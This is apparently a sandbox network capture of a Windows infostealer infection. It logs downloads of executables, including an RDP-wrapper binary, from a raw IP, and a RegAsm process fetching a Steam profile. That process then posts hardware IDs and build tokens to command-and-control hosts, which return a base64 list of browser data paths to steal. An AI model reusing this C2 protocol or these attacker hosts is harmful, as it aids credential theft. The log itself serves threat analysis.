Sep 27, 2024 01:49:53.482276917 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:53 GMT Content-Type: application/octet-stream Content-Length: 73728 Last-Modified: Thu, 26 Sep 2024 23:36:16 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5eff0-12000" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8f 99 ab c7 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 06 01 00 00 18 00 00 00 00 00 00 fe 23 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 23 01 00 4f 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0# @@ `#O@` H.text `.rsrc@@@.reloc`@B#H&-(#(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r0p((O(rp((rp(oE:rp(rp(rp({rp((XoY(Zb:rZp(o[*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49743	147.45.44.104	80	1892	C:\ProgramData\JKEHIIJJEC.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:49:54.415189028 CEST	94	OUT	GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Sep 27, 2024 01:49:55.119569063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:54 GMT Content-Type: application/octet-stream Content-Length: 1785344 Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f55533-1b3e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext\|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`\|@@p@@
Sep 27, 2024 01:49:55.119585991 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
Sep 27, 2024 01:49:55.119601011 CEST	448	IN	Data Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40 Data Ascii: @B@C@B@BH@C\|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
Sep 27, 2024 01:49:55.119611025 CEST	1236	IN	Data Raw: 58 12 40 00 08 00 01 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 64 50 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 39 00 7c 50 40 00 0b Data Ascii: X@@Self4dP@ClassName@Self@@9\|P@ClassNameIs@Self@Name+Q@ClassParentX@Self)(T@ClassInfo@Self,TQ@InstanceSize@
Sep 27, 2024 01:49:55.119651079 CEST	1236	IN	Data Raw: 4d 65 73 73 61 67 65 02 00 02 00 3f 00 4c 54 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 24 51 40 00 0b 4e Data Ascii: Message?LT@DefaultHandler@SelfMessage+$Q@NewInstance@Self,@Q@FreeInstance@Self'\|Q@Destroy@Self@@TObjectd@System@
Sep 27, 2024 01:49:55.119663954 CEST	1236	IN	Data Raw: 08 56 49 6e 74 65 67 65 72 02 00 54 11 40 00 08 00 00 00 02 07 56 53 69 6e 67 6c 65 02 00 78 11 40 00 08 00 00 00 02 07 56 44 6f 75 62 6c 65 02 00 88 11 40 00 08 00 00 00 02 09 56 43 75 72 72 65 6e 63 79 02 00 14 1e 40 00 08 00 00 00 02 05 56 44 Data Ascii: VIntegerT@VSinglex@VDouble@VCurrency@VDate@VOleStr@VDispatchl@VError@VBoolean@VUnknownd@VShortInt@VByte@VWord@
Sep 27, 2024 01:49:55.119674921 CEST	1236	IN	Data Raw: 25 78 c4 44 00 8b c0 ff 25 74 c4 44 00 8b c0 ff 25 70 c4 44 00 8b c0 ff 25 6c c4 44 00 8b c0 ff 25 68 c4 44 00 8b c0 ff 25 64 c4 44 00 8b c0 ff 25 60 c4 44 00 8b c0 ff 25 08 c4 44 00 8b c0 ff 25 5c c4 44 00 8b c0 ff 25 58 c4 44 00 8b c0 ff 25 54 Data Ascii: %xD%tD%pD%lD%hD%dD%`D%D%\D%XD%TD%D%D%D%PD%LD%D%D%D%HD%DD%@D%<D%8DS$DTBD$,t\$0D[@%4D
Sep 27, 2024 01:49:55.119687080 CEST	1236	IN	Data Raw: fc 8b 0d 3c 7a 44 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 ed fb ff ff 85 c0 74 4d 8b 15 28 7a 44 00 8b c8 c7 01 24 7a 44 00 a3 28 7a 44 00 89 51 04 89 02 8b d0 81 c2 f0 ff 13 00 8b ca 83 e9 Data Ascii: <zD)SjhhjtM(zD$zD(zDQ+<zD+8zD[3<zD3[=MpDt=)=xDu jD3tjlD3uSVWUNjhVj#
Sep 27, 2024 01:49:55.119699001 CEST	1236	IN	Data Raw: 00 39 d7 72 02 89 cf 29 fe 29 3d 3c 7a 44 00 89 35 38 7a 44 00 eb 21 0f b7 43 1a 89 c7 e8 19 fb ff ff 89 c6 85 c0 75 10 a2 34 7a 44 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06 89 4e fc 31 c0 a2 34 7a 44 00 89 1e 89 46 08 c7 46 0c 01 00 00 00 89 Data Ascii: 9r))=<zD58zD!Cu4zD_^[d7ON14zDFFsF KS){p_^[%4zDtK=xDuj%4zDt*j=,0u#DzDt
Sep 27, 2024 01:49:55.119710922 CEST	776	IN	Data Raw: b0 25 34 7a 44 00 74 2f f3 90 80 3d d5 78 44 00 00 75 e6 51 6a 00 e8 64 f2 ff ff 59 b8 00 01 00 00 f0 0f b0 25 34 7a 44 00 74 0c 51 6a 0a e8 4c f2 ff ff 59 eb c3 90 bb 0f 00 00 00 23 5e fc 09 eb 89 5e fc 89 cb 8b 57 fc f6 c2 01 75 09 83 ca 08 89 Data Ascii: %4zDt/=xDuQjdY%4zDtQjLY#^^WuW0r_CD.0r.4zD]_^[tG]_^[G,9=MpDt[%4zDt3
Sep 27, 2024 01:49:55.119847059 CEST	1236	IN	Data Raw: 88 07 89 d0 83 f9 01 83 df ff c1 e8 1c 81 e2 ff ff ff 0f 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 1b 81 e2 ff ff ff 07 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 Data Ascii: 000000?000G_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49747	45.132.206.251	80	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:49:56.922441006 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3189 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 01:49:56.922492027 CEST	3189	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KFIJEGCBGIDGHI
Sep 27, 2024 01:49:57.777582884 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 23:49:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49763	104.26.12.205	80	1892	C:\ProgramData\JKEHIIJJEC.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:50:34.690423012 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 27, 2024 01:50:35.303411007 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:50:35 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c97283639d68c9c-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 01:50:35.539146900 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Sep 27, 2024 01:50:35.659545898 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:50:35 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9728387cda8c9c-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	104.102.49.254	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:11 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:12 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:49:12 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=32bbb63ce6947e300594414c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 23:49:12 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:49:12 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 23:49:12 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 23:49:12 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:13 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49712	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:14 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:14 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 35 33 35 30 46 31 37 38 30 41 31 36 33 33 30 34 37 39 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 2d 2d 0d Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="hwid"C35350F1780A1633047986-a33c7340-61ca------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GDGHIDBKJEGIECBGIEHC--
2024-09-26 23:49:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:15 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|66a71a0d37978e6db5aece12523e11b3\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49713	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:15 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:15 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GCAEHDBAAECBFHJKFCFBCont
2024-09-26 23:49:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:16 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:17 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------IIEHJKJJJECFHJJJKKECCont
2024-09-26 23:49:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
